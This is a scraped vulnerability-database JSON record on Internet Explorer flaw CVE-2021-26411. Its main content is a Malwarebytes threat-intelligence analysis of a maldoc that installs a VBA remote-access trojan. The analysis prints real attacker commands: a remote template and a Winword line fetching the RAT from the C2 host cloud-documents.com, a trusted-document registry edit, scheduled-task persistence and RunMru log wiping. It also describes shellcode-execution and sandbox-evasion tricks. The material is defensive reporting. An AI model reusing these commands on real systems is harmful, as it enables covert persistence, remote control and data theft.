This is now reported as having been exploited in the wild by North Korean APT actors along with CVE-2020-1380 as noted at <https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>\n\nReported as exploited in the wild at <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>. Appears to be a memory corruption bug in Internet Explorer and Edge which would allow for a watering hole or drive by attack whereby a user is convinced to visit an attacker\u2019s malicious website and then the attacker would be able to gain RCE on the user\u2019s computer. Interestingly, despite this being a memory corruption bug, which is typically harder to exploit, Microsoft has still written up the exploitability of this vulnerability as Low.\n\nThere also appears to be an analysis of this vulnerability at <https://enki.co.kr/blog/2021/02/04/ie_0day.html> which suggests that this was the vulnerability used by the Laurus APT group to attack security researchers in Feburary. An English summary can be found at <https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/> which suggests that this vulnerability was a double free vulnerability in IE which was triggered by sending a user a malicious MHT/MHTML file, and if the user allowed script execution, then CVE-2021-26411 would be exploited.\n\nGiven that Mitja Kolsek of 0Patch was able to replicate this issue relatively quickly, I\u2019d say its likely that attackers will be able to exploit this vulnerability as well. I would expect to see more widespread exploitation of this vulnerability in the coming months.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26411", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-03-18T00:00:00", "id": "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "href": "https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:24:31", "description": "A security feature bypass vulnerability exists in the way Key Distribution Center (KDC) determines if a service ticket can be used for delegation via Kerberos Constrained Delegation (KCD).\n\nTo exploit the vulnerability, a compromised service that is configured to use KCD could tamper with a service ticket that is not valid for delegation to force the KDC to accept it.\n\nThe update addresses this vulnerability by changing how the KDC validates service tickets used with KCD.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mscve", "title": "Kerberos KDC Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2020-17049", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:22:55", "description": "Internet Explorer Memory Corruption Vulnerability \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mscve", "title": "Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "MS:CVE-2021-26411", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:49:48", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26878. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26878"], "modified": "2021-03-09T08:00:00", "id": "MS:CVE-2021-1640", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:49:36", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1640. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26878"], "modified": "2021-03-09T08:00:00", "id": "MS:CVE-2021-26878", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26878", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-08-02T20:33:41", "description": "_This blog post was authored by Hossein Jazi._\n\nOn July 21, 2021, we identified a suspicious document named "\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx" ("Manifest.docx") that downloads and executes two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit.\n\nWhile both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery. The attackers may have wanted to combine a social engineering technique with a known exploit to maximize their chances of infecting targets.\n\nWe also uncovered a panel used by the threat actor nicknamed "Ekipa" which seems to be a slang for "equipment". Victims are tracked and statistics include whether the IE exploit was successful or not.\n\nWe could not determine who might be behind this attack based on the techniques alone, but a decoy document displayed to victims may give some clues. It contains a statement from a group associating with Andrey Sergeevich Portyko and opposed to Putin's policies on the Crimean peninsula.\n\n### Remote templates\n\nBy looking closer at the remote template embedded in `settings.xml.rels` we noticed that it contains a full featured VBA Rat that performs the following actions:\n\n * Collects victim's info\n * Identifies the AV product running on a victim's machine\n * Executes shell-codes\n * Deletes files\n * Uploads and downloads files \n * Reads disk and file systems information\n\nThe second template is embedded in `Document.xml.rels` and is loaded into the document. Looking at the loaded code we noticed that it contains an [IE Exploit (CVE-2021-26411)](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) that was once used by Lazarus APT to target security researchers working on vulnerability disclosure, as reported by the threat research teams at [Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) and [Microsoft](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>). The shell-code executed using this exploit deploys the same VBA Rat that was loaded using remote template injection. \n\nAfter loading the remote templates the malicious document loads a decoy document in Russian which is pretty interesting. The decoy document is a statement from a group within Crimea that voices opposition to Russia and specifically Putin's policies against that peninsula. In the following, you can see this statement in both Russian and English language.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/decoy-2-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/decoy-2-1.png> \"\" )Figure 1: Decoy document\n\n### Document Analysis\n\nThe malicious document ("\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx") contains two templates in `settings.xml.rels` and `document.xml.rels`. The remote template that is located in `settings.xml.rels` downloads a macro weaponized template and loads it into current document. This remote template contains a macro code with full-featured Rat functionality. We provide the analysis of this VBA Rat in the next section.\n \n \n <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n <Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate\" Target=\"HtTpS:\\\\cloud-documents.com/doc/t.php?action=show_content\" TargetMode=\"External\"/></Relationships>\n\nThe second template is embedded in` document.xml.rels` and will be loaded in an object in the main document. This template contains an exploit code for CVE-2021-26411.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/doc.rels_.xml_-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/doc.rels_.xml_-1.png> \"\" )Figure 2: Document.xml.rels\n\nThis exploit code used by this remote template is almost similar to what has been reported by [ENKI](<https://enki.co.kr/blog/2021/02/04/ie_0day>) security firm. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/zero-day-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/zero-day-1.png> \"\" )Figure 3: Exploit code\n\nThe shell-code executed by this exploit deploys the same VBA Rat that is also loaded using the remote template embedded in `settings.xml.rels`. In fact, the actor tries to deploy its VBA Rat using two different methods. \nThe shell-code is very simple and performs the following actions. The shell-code is written in the [AutoHotKey](<https://www.autohotkey.com/docs/Language.htm>) scripting language and all of its actions are executed using `SendInput` API call. \n\n * Add VBA Rat as Trusted document to TrustedRecords registry key. By adding this Rat to this registry there won't be any need to enable the macro when this document will be opened next time. \n`reg add \\\"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\16.0\\\\Word\\\\Security\\\\Trusted Documents\\\\TrustRecords\\\" /V https://cloud-documents.com/doc/templates/agent.dotm /t REG_BINARY /d 00000000000000000040230e43000000f9d99c01ffffff7f /f\"`\n * Get the VBA Rat using: `Winword /w https://cloud-documents.com/doc/t.php?document_show=notica`\n * Make this VBA Rat persistence by creating a Scheduled task to execute it every minute: \n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n * Delete `RunMru` registry value to clear its track records. \n`Reg delete HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMru \\f`\n\n### VBA Rat analysis (Remote Template)\n\nThe remote template contains `Document_Open` and `Document_Close` which are activated upon opening and closing the document. \n\n#### Document_Open:\n\nThe `Document_open` function checks if the active document has the docx extension and if that is the case it shows the hidden content (decoy content). Then, if the active document name is `\"_.dotm\"` (this is the case when the machine is already infected with this Rat), it calls `\"ConnectCP\"` function. The `ConnectCP` function is responsible for collecting victim's info by calling the following functions as well as a value named `\"cve\"` in `CustomDocumentProperties` (this value is being set during the first execution of this document).\n\nAfter collecting data, it converts it into a json format by using the `JsonConvertor` function. The collected data later is used by the `SCI` function to be sent to the server and receive commands. \n\n * getUUID: Gets UUID by executing `\"SELECT * FROM Win32_ComputerSystemProduct\"`\n * getOS: Gets OS type by executing `\"SELECT * FROM Win32_OperatingSystem\"`\n * arch: Returns OS architecture\n * getCPU: Gets CPU info by executing `\"SELECT * FROM Win32_Processor\"`\n * getGPU: Gets GPU info by executing `\"SELECT * FROM Win32_VideoController\"`\n * getRAM: Gets physical memory capacity by executing` \"SELECT * FROM Win32_PhysicalMemory\"`\n * getStorage: Gets available hard drive space by executing `\"Select * from Win32_LogicalDisk Where DriveType = 3\"`\n * getName: Gets computer name, user name and domain name\n * getRole: Identify if the victim has admin role or not.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/getrole-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getrole-1.png> \"\" )Figure 4: GetRole\n\n * getAV: Gets Anti-Virus product info including the AV name, AV status (enabled or disabled) and AV signature stature (outdated or actual). To get these info it executes `\"Select * from AntiVirusProduct\"` to get the list of active Anti Virus products and then calls `DisplayName` to get the AV name and then identify the AV status and AV signature status using the product state codes. As an example if the product state code is 266240, it means that the AV product is enabled and its signature is updated. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/getav-5.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getav-5.png> \"\" )Figure 5: GetAV\n\nAt the end, the `ConnectCP` function calls the `StartTimer` function to start the task execution procedure (`ExecuteTasks` function). This function creates a timer that calls the `ExecuteTasks` function every 10 minutes to execute the tasks received from the server.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/timer-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/timer-1.png> \"\" )Figure 6: Set Timer\n\nIf the active document name is not `\"_.dotm\"` (The machine has not been infected before with this VBA Rat), it calls a function named `InstallFromExp` after making sure it is not running within a Sandbox environment and its extension is `dotm`. The attacker checks the value of the following registry key and if the value is equal to one it won't execute the `InstallFromExp`.\n \n \n HKCU\\Software\\Microsoft\\Office\\&Application.Version&\\Excel\\Security\\VBAWarnings\n\nThe value one for this registry key means that all untrusted and trusted macros are allowed to run without any notification which usually is a default setting for sandbox environments to run macro embedded documents automatically. \n\n`InstallFromExp` performs the basic initialization of this Rat which includes the following three actions: \n\n * Sets the `customDocumentProperties` named `\"cve\" `to "2021-26411".\n * Makes itself persistence by adding itself to word startup directory with `\"_.dotm\"` name: `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Cleans up its track records by deleting `RunMRU` registry key\n * Exits the program\n\n#### **Document_Close**\n\nThis function also performs the installation of the Rat but by calling a different function: `InstallFromMacro`. Before calling the installation function it calls the same `Sandbox` function to make sure it is not running into a sandbox environment and then checks if the path of the attached template includes `http` to make sure it has an embedded remote template url.\n\n`InstallFromMacro` performs initialization of the Rat which includes the following three actions:\n\n * Opens the attached remote template as a document and extract the contents of the comments section of the BuiltInDocumentProperties and spilts it by "|". If the OS is 32 bit it takes the first part of the the comments and puts it in `skd` variable and if the OS is 64 bit it takes the second part of the comments section and puts it into `skd`. The `skd` variable later is used as a parameter for `AddTask` function.\n * Sets the `customDocumentProperties` named "cve" to "MACRO".\n * Make itself persistence by adding itself to word startup directory with "_.dotm" name: `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Calls `AddTask` function\n * Cleans up its track records by deleting `RunMRU` registry key\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/installrat.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/installrat.png> \"\" )Figure 7: Rat installation\n\n### AddTask (Shell-Code execution using EnumWindows)\n\nThis function base64 decodes the content from the `skd` variable that has been set in `InstallFromMacro` function and executes it using `VirtualProtect` and `EnumWindows`. In fact the content of the `skd` is a small shell-code that has been executed within the memory without being written into disk. The actor has used an interesting API call for ShellCode execution. Instead of using well known API calls for shell code execution which can easily get flagged by AV products such as `VirtualAlloc`, `WriteProcessMemory`, and `CreateThread` the actor has used `EnumWindows` to execute its shell-code.\n\nThe second argument of `EnumWindows` is an application-defined value to be passed to the callback function. By providing the address of the shell-code from `VirtualProtect` as second parameter to this function, it can execute the Shell-code.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/addtask-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/addtask-1.png> \"\" )Figure 8: AddTask\n\nThe executed shell-code is very small and it just persists by creating a Scheduled task to execute it every minute:\n\n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n\nSimilar to the shell-code used in IE exploit, this shell-code is also written using AutoHotKey scripting language and it is using `SendmessageA` and `SendInput` to simulate keystrokes and perform its actions. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/shellcode.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/shellcode.png> \"\" )Figure 9: Shell-code API and function calls resolving \n\n### ExecuteTasks\n\nThis is the main function of this VBA Rat that receives the command from the server in Json format and then parses the json file and executes the command. Each time this function can execute three tasks. This has probably been set to avoid making noise in network activities which might be detected by security products. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/ExecuteTasks-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/ExecuteTasks-1.png> \"\" )Figure 10: Executes tasks\n\nTo receive the tasks from the server this function receives one argument which is a function named `SCI`. `SCI` function sends the collected data by `ConnectCP` function in json format in a `HTTP POST` request and receives the response from the server which includes the tasks that need to be executed in JSON format.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/sci-2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/sci-2.png> \"\" )Figure 11: Send info to server and receive commands\n\nHere is the list of commands that can be executed by this Rat. After executing each task the results of task execution will be sent to server.\n\n#### ReadDisks\n\nIt gets each Drive information on the machine using `Scripting.FileSystemObject.Drives` object. It then creates a JSON object which includes the following key and values for each drive object:\n\n * IsReady: this value sets to true if the drive is ready\n * Label: gets name of the drive which will be either ShareName or VolumeName. This depends on whether the drive is remote or not\n * Filesystem: gets the file system in use for the drive\n * Freespace: gets the amount of free space for the drive in KB \n * Name: gets the drive letter\n * IsDirectory: This value is always True\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/readdisks-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/readdisks-1.png> \"\" )Figure 12: Read Disks\n\n#### ReadFileSystem\n\nThis function gets a Folder object corresponding to the folder in a specified path using `Scripting.FileSystemObject.GetFolder` object and then extracts it name, size, date last modified and puts them into a Json object. It also extracts the same information for all sub-folders and files in that Folder object and adds them to the Json object.\n\n#### Download File\n\nThis function reads a specified file using `Adobe.Recordset `and sends the data to sever using HTTP POST request. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/DOWNLOAD-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/DOWNLOAD-1.png> \"\" )Figure 13: Download File\n\n#### Upload File\n\nThis module receives a file from the server and writes it into specified file. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/UPLOAD-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/UPLOAD-1.png> \"\" )Figure 14: Upload File\n\n#### DeleteFile\n\nThis function uses Kill function to delete the specified file or directory. \n\n#### Terminate\n\nThis function terminates the execution of the Rat and exits the application.\n\n#### Execute\n\nThis function executes the received shell-code from the server using the same method used in `AddTask` function in which it has used `VirtualProtect `and `EnumWindows` to execute the shell-code. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/executr-1.png)Figure 15: Execute Shell-code\n\n#### ChangeTiming\n\nThis function resets the timer that is used to execute tasks every 10 minutes by calling `EndTimer` to kill the timer and then calling `StartTimer` to start a new timer. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/str.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/str.png> \"\" )Figure 16: Send results\n\n### Attacker panel\n\nWe were able to access to the panel used by the attacker. The panel's main page includes the list of victims with some information about them including: IP address, date and time, NTLM, Windows version, Windows Architecture, Office version, Office architecture, IE version, Exploited (shows if the IE zero day was successful or not), Loader (shows if the VBA Rat successfully executed or not) and note. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/panel-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/panel-1.png> \"\" )Figure 17: The panel\n\nThe panel is written in PHP with a backed SQL database to store data. This `install.php` initializes the SQL database.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/install-4.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/install-4.png> \"\" )Figure 18: Install.php\n\n`stats.php` is the file that performs the main actions of this Rat that matches the functionalities we reported here. It also has some more functions including: `delete_task, disable_task, enable_task, show_tasks, add_task, format_task and add_user.`\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/downupfuncs-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/downupfuncs-1.png> \"\" )Figure 19: Stats.php [![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/actions-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/actions-1.png> \"\" )Figure 20: Stats.php\n\n### Conclusion\n\nIn this blog post we have analyzed an attack in which threat actors have used two different methods to infect their victims. Both techniques have been loaded by malicious documents using the template injection technique. The first template contains a url to download a remote template that has an embedded full-featured VBA Rat. This Rat has several different capabilities including downloading, uploading and executing files. The second template is an exploit for CVE-2021-26411 which executes a shell-code to deploy the same VBA Rat. The VBA Rat is not obfuscated but still has used some interesting techniques for shell-code injection.\n\nAs the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well. The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag. \n\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/blockcrima-600x516.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/blockcrima.png> \"\" )\n\n### IOCs\n\n**Maldocs: \n**03eb08a930bb464837ede77df6c66651d526bab1560e7e6e0e8466ab23856bac \n0661fc4eb09e99ba4d8e28a2d5fae6bb243f6acc0289870f9414f9328721010a \n \n**Remote template:** \nfffe061643271155f29ae015bca89100dec6b4b655fe0580aa8c6aee53f34928 \n \n**C2 server:** \ncloud-documents[.]com\n\nThe post [Crimea "manifesto" deploys VBA Rat using double attack vectors](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-29T15:00:00", "type": "malwarebytes", "title": "Crimea \u201cmanifesto\u201d deploys VBA Rat using double attack vectors", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:00:00", "id": "MALWAREBYTES:232C556149FB9AC828C416ADCCF93766", "href": "https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:19", "description": "A memory corruption vulnerability exists in Microsoft Internet Explorer. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (CVE-2021-26411)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-09T00:00:00", "id": "CPAI-2021-0108", "href": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-03-18T09:57:50", "description": "On the off chance you were looking for more security to-dos from **Microsoft **today\u2026the company released software updates to plug more than 82 security flaws in Windows and other supported software. Ten of these earned Microsoft's "critical" rating, meaning they can be exploited by malware or miscreants with little or no help from users.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nTop of the heap this month (apart from the [ongoing, global Exchange Server mass-compromise](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>)) is a patch for an **Internet Explorer** bug that is seeing active exploitation. The IE weakness -- [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>) -- affects both IE11 and newer EdgeHTML-based versions, and it allows attackers to run a file of their choice by getting you to view a hacked or malicious website in IE.\n\nThe IE flaw is tied to a vulnerability that was publicly disclosed in early February by researchers at [ENKI](<http://enki.co.kr/blog/2021/02/04/ie_0day.html>) who claim it was one of those [used in a recent campaign by nation-state actors to target security researchers](<https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/>). In the ENKI blog post, the researchers said they will publish proof-of-concept (PoC) details after the bug has been patched.\n\n"As we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits," said **Satnam Narang**, staff research engineer at **Tenable**. "We strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as 